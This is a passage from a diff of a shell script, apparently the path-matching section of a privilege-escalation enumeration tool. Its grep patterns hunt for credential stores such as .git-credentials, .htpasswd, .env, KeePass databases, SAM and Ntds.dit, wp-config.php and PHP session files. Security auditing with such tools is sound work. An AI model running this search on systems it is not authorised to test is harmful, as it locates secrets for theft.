"$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_PYPIRC=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.pypirc$" | sort | uniq | head -n 70) - PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) - PSTORAGE_HISTORY=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\..*_history$" | sort | uniq | head -n 70) - PSTORAGE_HTTP_CONF=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_HTPASSWD=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) - PSTORAGE_LDAPRC=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) - PSTORAGE_ENV=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.env$" | sort | uniq | head -n 70) - PSTORAGE_MSMTPRC=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) - PSTORAGE_GITHUB=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) - PSTORAGE_SVN=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.svn$" | sort | uniq | head -n 70) - PSTORAGE_KEEPASS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) - PSTORAGE_FTP=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|ws_ftp\.ini$" | sort | uniq | head -n 70) - PSTORAGE_BIND=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "bind$" | sort | uniq | head -n 70) - PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "seeddms.*$" | sort | uniq | head -n 70) - PSTORAGE_DDCLIENT=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) - PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) - PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) - PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|php\.ini$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security$|security\.sav$|server\.xml$|services\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) - PSTORAGE_DATABASE=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) - PSTORAGE_BACKUPS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "backup$|backups$" | sort | uniq | head -n 70) - PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) + PSTORAGE_SYSTEMD=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/systemd|^/sys|^/system|^$GREPHOMESEARCH|^/lib32|^/etc|^/var|^/applications|^/cdrom|^/private|^/media|^/srv|^/.cache|^/sbin|^/mnt|^/lib|^/tmp|^/snap|^/lib64|^/run|^/bin|^/usr|^/opt" | grep -E ".*\.service$" | sort | uniq | head -n 70) + PSTORAGE_TIMER=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/systemd|^/sys|^/system|^$GREPHOMESEARCH|^/lib32|^/etc|^/var|^/applications|^/cdrom|^/private|^/media|^/srv|^/.cache|^/sbin|^/mnt|^/lib|^/tmp|^/snap|^/lib64|^/run|^/bin|^/usr|^/opt" | grep -E ".*\.timer$" | sort | uniq | head -n 70) + PSTORAGE_SOCKET=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/systemd|^/sys|^/system|^$GREPHOMESEARCH|^/lib32|^/etc|^/var|^/applications|^/cdrom|^/private|^/media|^/srv|^/.cache|^/sbin|^/mnt|^/lib|^/tmp|^/snap|^/lib64|^/run|^/bin|^/usr|^/opt" | grep -E ".*\.socket$" | sort | uniq | head -n 70) + PSTORAGE_DBUS=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) + PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "mysql$" | sort | uniq | head -n 70) + PSTORAGE_MARIADB=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) + PSTORAGE_POSTGRESQL=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) + PSTORAGE_APACHE=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "sites-enabled$|000-default\.conf$" | sort | uniq | head -n 70) + PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/tmp|^/mnt|^/private|^/var" | grep -E "sess_.*$" | sort | uniq | head -n 70) + PSTORAGE_PHP_FILES=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_WORDPRESS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) + PSTORAGE_DRUPAL=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E '/default/settings.php' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_MOODLE=$(echo -e 